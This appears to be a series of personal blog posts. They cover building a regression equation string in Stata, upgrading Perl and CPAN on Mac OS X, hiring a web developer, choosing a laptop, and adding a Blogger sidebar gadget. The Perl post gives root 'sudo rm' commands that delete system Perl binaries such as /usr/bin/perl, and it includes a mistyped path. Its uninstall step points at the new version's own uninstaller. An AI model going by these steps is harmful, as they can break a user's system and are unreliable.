<br />
xi: svy: reg y car i.roofmaterial i.fencematerial i.hhsize ...<br />
<br />
<br />
you will find some great information stored in the ereturn value "e(b)"<br />
<br />
<br />
matrix list e(b)<br />
<br />
<br />
anyways, to make an equation with the regression variables and beta_hats, try the following:<br />
<br />
local varnames_rural : coln e(b) // Stores the column names (i.e. variable names) in a local macro. <br />
local equation_rural "" // Will put the equation in this local macro<br />
foreach varn of local varnames_rural { // Loop through all the column (variable) names<br />
local coef = _coef[`varn'] // This is the beta_hat corresponding to the variable name (inc. categorical vars)<br />
if ("`varn'" != "_cons") { // The constant in the regression shouldn't be multiplied by anything<br />
if (`coef' < 0) { // we want to put a "+" before positive coefficients, but not before negative coefficients<br />
local equation_rural "`equation_rural' `coef'*`varn'"<br />
}<br />
else {<br />
local equation_rural "`equation_rural' + `coef'*`varn'"<br />
}<br />
}<br />
else {<br />
if (`coef' < 0) {<br />
local equation_rural "`equation_rural' `coef'"<br />
}<br />
else {<br />
local equation_rural "`equation_rural' + `coef'"<br />
}<br />
}<br />
} <br />
di "equation: `equation_rural'" <br />
<br />
How about if you want to save this to a file, so that you can load it into a macro in another do file? Try this:<br />
<br />
tempname fh<br />
file open `fh' using "myfile.txt", w replace all<br />
file write `fh' "`equation_urban'" _n<br />
file close `fh'<br />
<br />
Now, in your new do file that has the applications.dta dataset, with the same variables names, you can use the following code to calcualte y_hat_2 for the applications.dta dataset:<br />
<br />
// load the equation<br />
tempname fh2<br />
file open `fh2' using "myfile.txt", r t <br />
file read `fh2' line1<br />
file close `fh2'<br />
<br />
di `"line1 = `line1'"'<br />
<br />
gen y_hat_2 = `line1'<br />
<br />
This should work - leave a comment if it doesn't. Good luck!<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-74808413730008865522012-04-30T22:22:00.000-07:002012-10-03T05:45:28.078-07:00Upgrading Perl from 5.12 to 5.14; installing YAML; fixing problem of not being able to install CPAN modules<div dir="ltr" style="text-align: left;" trbidi="on">
I don't know what happened since the last post, but I was no longer able to install CPAN modules on my MacBook Pro running Mac OS X Snow Leopard. CPAN didn't like that YAML was not installed, and I wanted to upgrade my Perl installation from 5.12 to 5.14. Finally, I figured all this out. Here is what I did:<br />
<br />
1. Install Perl 5.14. Instructions are <a href="http://docs.activestate.com/activeperl/5.14/install.html#installing%20activeperl%20on%20mac%20os%20x%20%28x86%29" target="_blank">here</a>. I downloaded the package from <a href="http://www.activestate.com/activeperl/downloads" target="_blank">http://www.activestate.com/activeperl/downloads</a>, opened the installer and installed the package. This part is easy and straightforward.<br />
<br />
After this step, however, my Mac was still using Perl 5.12 rather than the new version. You can check which version your Mac is using by opening a terminal and typing:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">perl -v</span><br />
<br />
So you need to add the path to the new Perl version to your path.<br />
<br />
2. Instructions for adding the path to the new Perl version to your path your Mac is <a href="http://docs.activestate.com/activeperl/5.14/install.html#installing%20activeperl%20on%20mac%20os%20x%20%28x86%29" target="_blank">here</a>. More instructions on how to edit the path file (".profile" file in your user home directory) are available at <a href="http://www.tech-recipes.com/rx/2621/os_x_change_path_environment_variable/" target="_blank">http://www.tech-recipes.com/rx/2621/os_x_change_path_environment_variable/</a> and <a href="http://www.tech-recipes.com/rx/2618/os_x_easily_edit_hidden_configuration_files_with_textedit/" target="_blank">http://www.tech-recipes.com/rx/2618/os_x_easily_edit_hidden_configuration_files_with_textedit/</a>. Doing this tells your Mac where to look for Perl when you type the perl command at the command prompt.<br />
<br />
Your .profile file will be located in the "user home directory." For me, this is /Users/shafique. For you it will be whatever /Users/<whatever computer="" is="" on="" username="" your="">. To check what is in your PATH environment variable, in the terminal window type:</whatever><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">env</span><br />
<br />
or<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">echo $PATH</span><br />
<br />
Now to add the new path to my path variable, I edited the .profile file using a text editor:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">open ~/.profile</span><br />
<br />
Go to the Text Editor, and add the following lines at the end of the text file that the editor just opened:<br />
<br />
<pre><span style="font-family: "Courier New",Courier,monospace;">PATH=/usr/local/ActivePerl-5.14/bin:$PATH
PATH=/usr/local/ActivePerl-5.14/site/bin:$PATH
export PATH</span></pre>
<pre> </pre>
<pre></pre>
Save and close the .profile file. Then go back to your terminal and type:<br />
<br />
<code>. ./.profile
echo $PATH</code><br />
<pre></pre>
Yes, you will type out all three dots on this line. This adds the new Perl path to your environment PATH variable. Now you should be all set. To check which Perl version you are now running, type:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">perl -v</span><br />
<br />
and it should show that you are running version 5.14. If not, check your PATH variable:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">env</span><br />
<br />
or<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">echo $PATH</span><br />
<br />
If it doesn't show that the new Perl version directory has been added to your PATH variable, then... well I don't know what to do. <br />
<br />
3. Go ahead an install YAML. In your terminal window, type:<br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">sudo perl -MCPAN -e 'install +YAML'</span><br />
<br />
and then enter your password when the terminal asks for it. <br />
<br />
4. Go ahead and upgrade CPAN. In your terminal window, type:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">sudo perl -MCPAN -e 'install CPAN'</span><br />
<br />
5. <a href="http://docs.activestate.com/activeperl/5.14/install.html#uninstalling%20activeperl%20on%20os%20x" target="_blank">Uninstall</a> previous versions of Perl:<br />
<br />
<pre>sudo /usr/local/ActivePerl-5.14/bin/ap-uninstall</pre>
<br />
6. Remove all symbolic links to previous version of perl in the directories listed in your $PATH variable and replace them with symbolic links to the new versions. Start by finding out which paths may have outdated links:<br />
<br />
echo $PATH<br />
<br />
Here is what I had to do:<br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">sudo rm /opt/local/bin/perl</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo rm /opt/local/bin/perl</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo rm /opt/local/bin/perl5</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo rm /opt/local/bin/perl5.12</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo rm /opt/local/bin/perl5.12.4</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo rm /user/bin/perl</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo rm /usr/bin/perl</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo ln -s /usr/local/ActivePerl-5.14/bin/perl /usr/bin/perl</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo ln -s /usr/local/ActivePerl-5.14/bin/perl /opt/local/bin/perl</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo ln -s /usr/local/ActivePerl-5.14/bin/perl /opt/local/bin/perl</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo ln -s /usr/local/ActivePerl-5.14/bin/perl /usr/local/perl</span><br />
<br />
If you don't do this, then your editor (I'm using Komodo Edit) might use the wrong @INC variable, which could cause you problems - e.g. it might think you don't have a cpan module that you actually have installed.<br />
<br />
You should be all set now. You should be able to install Perl modules without any problems. <br />
<br />
Good luck!<br />
<br />
UPDATE (03 Oct 2012): If you're using MacPorts, you can just use the following command:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">sudo port install perl5 +perl5_14</span><br />
<br />
But then when you install cpan modules, you have to use macports to install them.<br />
<br />
<br />
<br />
<br />
<pre></pre>
<br />
<br /></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com1tag:blogger.com,1999:blog-2722671667390463266.post-38434859453006472622012-04-07T14:37:00.002-07:002012-05-14T21:19:15.872-07:00Trouble installing perl CPAN Modules on Mac OS X<div dir="ltr" style="text-align: left;" trbidi="on">
I recently ran into problems trying to install perl CPAN modules. I did the following keyword searches to find answers:<br />
<br />
mac won't install CPAN modules<br />
<br />
Finally, I decided to upgrade the perl installation on my machine from 5.8 to 5.12. This fixed everything - I can now install perl modules using CPAN without problems. Here is how I did it:<br />
<br />
(ref: http://stackoverflow.com/questions/3942520/how-do-i-upgrade-my-macports-perl-installation. And note that I was using macports to do the installation)<br />
<br />
<pre class="lang-perl prettyprint"><code><span class="pln">sudo port uninstall </span><span class="pun">-</span><span class="pln">f perl5</span><span class="pun">.</span><span class="lit">8</span></code></pre>
<pre class="lang-perl prettyprint"><code><span class="pln">sudo port install perl5 </span><span class="pun">+</span><span class="pln">perl5_12</span></code></pre>
<pre class="lang-perl prettyprint"><code><span class="pln">sudo port -f activate perl5.12 </span></code></pre>
<pre class="lang-perl prettyprint"><code><span class="pln"> </span></code></pre>
You can check the installation by typing:<br />
<br />
perl -v <br />
<br />
So far, it works well.<br />
<br />
Now, I want to be able to pull context (text) from PDFs. I have come across the following modules:<br />
<br />
(ref: http://www.perlmonks.org/?node_id=634794, http://stackoverflow.com/questions/5977969/how-to-parse-pdf-files-in-perl)<br />
<br />
PDF::parse<br />
PDF:API2<br />
<a href="http://search.cpan.org/perldoc?PDF">PDF</a> <br />
<br />
I take it that these produce XML from from the PDF content, and then one can parse the XML using the following modules:<br />
<br />
(ref: http://stackoverflow.com/questions/5977969/how-to-parse-pdf-files-in-perl) <br />
<br />
<a href="http://search.cpan.org/perldoc?XML%3a%3aTwig" rel="nofollow">XML::Twig</a><br />
XML::Simple<br />
<br />
I haven't started pulling PDF content yet though. I think I will just use pdftohtml, like the above link says:<br />
<br />
sudo port install pdftohtml<br />
<br />
(I could also try xpdf)<br />
<pre class="lang-perl prettyprint"><code><span class="lit"></span><span class="pln"></span></code></pre>
</div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-21866137553153803542012-02-17T04:38:00.000-08:002012-02-17T05:11:43.228-08:00Stata Tutorial 2 (A simple do file and cross tabulation)<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="http://www.youtube.com/watch?v=gKVi3lKe33U" target="_blank">...is now up! Click here to see the youtube video. </a><br />
<br />
Please do leave comments. Cheers. </div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-59529824843535473492012-02-16T23:58:00.001-08:002012-06-22T13:08:36.895-07:00Stata Tutorial 1 (Introduction to using Stata)<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="http://www.youtube.com/watch?v=vChrAFZ3r6E" target="_blank">...is now up! Click here to view.</a> And please do post comments to let me know what you think.<br />
<br />
UPDATE: The font is small in this tutorial - I have made it bigger for tutorial 2. But you can access a google doc with all the commands and output by clicking the following link:<br />
<br />
<a href="https://docs.google.com/document/pub?id=1IjVOm4-Bvmfm69fgZ7oxvZEYBvcZAgAX2XdiE3WQRbE" target="_blank"> https://docs.google.com/document/pub?id=1IjVOm4-Bvmfm69fgZ7oxvZEYBvcZAgAX2XdiE3WQRbE</a> </div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-56960731762663084932011-12-17T22:05:00.000-08:002011-12-18T01:03:42.863-08:00Some advice for working with a web developer to develop a website<div dir="ltr" style="text-align: left;" trbidi="on">
I am looking to have a website developed. I can actually program in PHP and have developed a not-so-simple social website myself, but I still haven't program with objects and I'm not that efficient (and I can't make things look good). Since I don't comparative advantage in developing websites, I'm working with a firm to do that for me. I've spoken to a couple of firms that design and develop websites, and received a couple of quotes. I asked my computer whiz colleague for advice on dealing with website development firms (I sent him one of the quotes that I received), and I'm pasting below his advice.<br />
<br />
---<br />
Looks great indeed. A few points:<br />
<br />
-There is no descriptive of your project. This means they
eyeballed the cost, and have large safety margins. It's not a
complex project, so it's not a major downside to eyeball the project
as a whole instead of making an estimation by item.<br />
<br />
-They seem responsive, or at least tell you they will be. That
is an important part. Communication is always key to good work
relationship.<br />
<br />
-They offer two rate options: hourly and flat, which is a good
signal. If it were me, I would go for hourly and guide them through
the project: for sure the project will look more like what you want
it, and it should end up cheaper (see my first point). But perhaps
it does not matter enough to you, and you think they have better
ideas than you on how the website should be. In that case, go with
fixed rate.<br />
<br />
-I you want to go hourly, I would recommend you get the
functional analysis before the actual coding happens: <br />
<br />
-graphical appearance (actual work. Do you have a logo?)<br />
-workflow of the data process (web page by web page), <br />
-schematic drawing of each interface, <br />
-data dictionnary. <br />
<br />
Only then should you approve to start the coding. They wont like so
much paperwork, but it is a good practice and protects everyone. I
would also suggest to do as much work yourself as you can: draw
schematic interfaces on your word processor and share with the
programmer before he starts with the paperwork. The more you guide,
the better (and cheaper) the project will be.<br />
<br />
The alternative to guiding them with the hourly rate is to let them
propose their stuff with the fixed rate. Do it if you are not risk
averse, both on quality and time to completion. You can get
surprises, both good and bad. Just a word of caution: there is also
an outside risk of having a project absolutely not what you wanted
and they ask for more money, arguing it was not in the contract. If
the functional analysis is not complete, all bad things can happen.
The devil is always in the details, and turnkey projects are not
always as turnkey as we hope they will be...<br />
<br />
Also, remember that coding is only a small part of the project.
Calculate <br />
<br />
1/3 analysis and preparation<br />
1/3 coding<br />
1/3 implementation: Adjustments and changes, debugging, actual
setup of the server ready for real data, etc. <br />
<br />
Also, the work is not over even on the launch day. Expect problems,
adjustments, etc... The more analysis you do, the easier the
implementation. If they tell you 6 weeks, expect 3 times as much for
your real launch day. No kidding. Get ready: it will take 3 times as
much time as they say it will, always. <br />
<br />
You should ask for the alpha version: the first version that allows
you to see how the project works, with most of the interfaces ready,
and then there is the beta version, the first complete version. Find
friends and family to play around your beta version and try to crash
the program: the more people who try the beta version, the better. <br />
<br />
Analogous to what you are about to do is to make renovations in your
home. Talk to home owners about their experience renovating, and you
hear about horror stories. It's the same kind of problems in
renovation and hiring a programmer: you can expect to handle
(sometimes frustrating) issues on a regular basis for this project,
turnkey or not. Fortunately, it's a small project, bet even then
problems arise! There are financial risks involved, for the value of
what you put it. Asking a contractor to make work for you is never a
fully safe bet. Worse case scenario is you loose all of what you put
in, and it happens in real life. Watch your back :)<br />
<br />
But also sometimes you find the golden helper. No problems, goes out
of is way to help, and you get what you want and on time. Rare, but
they exist. Like in renovation: it's not always a catastrophe! It
depends a lot on the rapport you will establish with the guys
actually doing the work. <br />
<br />
Finally, think servicing on the longer run. You will probably not
want to do it yourself. Budget a minimum of 15% per year,
(unexpected problems, updates of platform software creating problems
with your code, crashes etc...) excluding expansion of functions,
and also excluding amortizing for the next version of the project.
Expect a complete rewrite from scratch in 2 to 5 years, depending on
the speed at which your business changes, and the quality of the
initial work.<br />
<br />
<br />
Good luck!<br />
--- <br />
<br />
<br />
<br /></div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-37535558265723076532011-12-17T21:54:00.000-08:002011-12-18T01:15:19.293-08:00Computer buying advice<div dir="ltr" style="text-align: left;" trbidi="on">
Recently, my MacBook Pro, which I purchased in February of 2008, sort of died. The computer works, but the Nvidia video card has died. Apple has extended the warranty for this, but I'm stuck in Central Asia until March, so won't be able to get it to an Apple authorized repair facility. So I have to look for a new computer.<br />
<br />
I'm wondering whether to forgo getting another Mac go back to using a PC. I'm not a fan of Windows, and a colleague of mine has recommended using Ubuntu Linux. He's a computer wiz, so can handle a non-standard operating system. I'm not so sure that I can. Anyways, that will be another post.<br />
<br />
I asked said colleague for advice on buying a computer, and I'm pasting below what he wrote. Now, computer buying advice is far from timeless. And the advice you should get will depend on what you need the computer for. I will be using STATA (heavily computationally intensive), watching movies (need a good graphics card). My partner will want to do lots of document editing, and will want a big screen. It will stay in the home, so portability and battery life are not priorities. <br />
<br />
---<br />
I would indeed get a Sony Vaio. I currently use a rugged IBM
lenovo that was lent to me, I appreciate its 5 hours of battery in
Africa. But it's not that powerful (despite its 8 gb of memory); I
would need to change it within a year or two.<br />
<br />
My suggestion is to obtain a core i5 with nvidia GPU (From
Sony). My personal choice would be for a 16 inch high definition,
but I tend to like big screens more than most.<br />
<br />
Make sure you upgrade right away to the maximum memory possible.
Not doing so is not worth it: max it out! This means using a 64 bits
Os: you need 64 bits addressing to go over 4 gb of memory.<br />
<br />
You will want a good graphics card inside your laptop. I
recommend Nvidia based with at least 512 <u>independent</u> memory,
preferably 1 Gb with a recent GPU. I prefer nvidia to the others,
especially with Ubuntu. That is what in my opinion makes the biggest
difference between the lower end and the higher end laptops. Macs
always have high end graphics cards.<br />
<br />
Ubuntu is a big jump! Congrats. The most recent version is
11.10. I use 11.04. Make sure you have the 64 bits version, and you
probably want to log in the desktop edition (Gnome), not the netbook
edition (Unity). It's a combo box at login. <br />
<br />
I suggest you shop a little, perhaps on sony vaio's web site.
Compare with other companies also if you want. I'm not sure what are
the models these days...<br />
<br />
I stumbled upon this; it might help to compare laptops and get quite
good reviews on them. I wish I could find all models on this :)<br />
<br />
<a href="http://www.pcmag.com/products/compare/1565?aid=264717,289826,266527,264126" target="_blank">http://www.pcmag.com/products/compare/1565?aid=264717,289826,266527,264126</a><br />
<br />
This is a selection I made of very different laptop types. Hopefully comparing them will help you orient your search. <br />
---</div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-82034943518851585262011-11-19T08:34:00.001-08:002011-11-19T08:50:00.063-08:00How to add a custom category to the side bar on your blogspot blog, and populate it with links to selected posts<div dir="ltr" style="text-align: left;" trbidi="on">
In my side bar on this blog, I have a category called STATA, below which are links to all my posts that are about STATA tips (right now, I have only one such post). Here is a link to the page that gave me instructions on how to do this:<br />
<br />
<a href="http://www.bloggersentral.com/2010/04/list-recent-posts-by-label.html">http://www.bloggersentral.com/2010/04/list-recent-posts-by-label.html</a><br />
<br />
Basically, here's what you need to do:<br />
<br />
1. Pick a name for the category; this will be the same as the name of the label that you will apply to all posts that you want to include in the category. So your category could be something like (without the quotes): "STATA tips" (under this would be links to your posts related to tips on doing things in STATA) or "Books I am reading" (under this would links to your posts that discuss the books you have been reading)<br />
<br />
2. In Blogger.com, click "Dashboard" and click posts to list all the posts for your the blog. Create the label that you chose in step one and apply it to all the posts that you want to appear in under this category.<br />
<br />
3. Click "Layout" in the left sidebar and select "Add Gadget." In some templates for blogger, you might have to click "Design." When you click "Add Gadget" a pop-up window will appear.<br />
<br />
4. In the left sidebar in this window, click the first tab, "Basics." Then scroll down and look for the Gadget "HTML/Javascript."<br />
<br />
From here you can follow the instructions available at the link above. The only think I would do differently from the instructions at the link is that I would make the changes (e.g replace YOUR_BLOG_URL, etc.) BEFORE saving, NOT after.<br />
<br />
Good luck!</div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0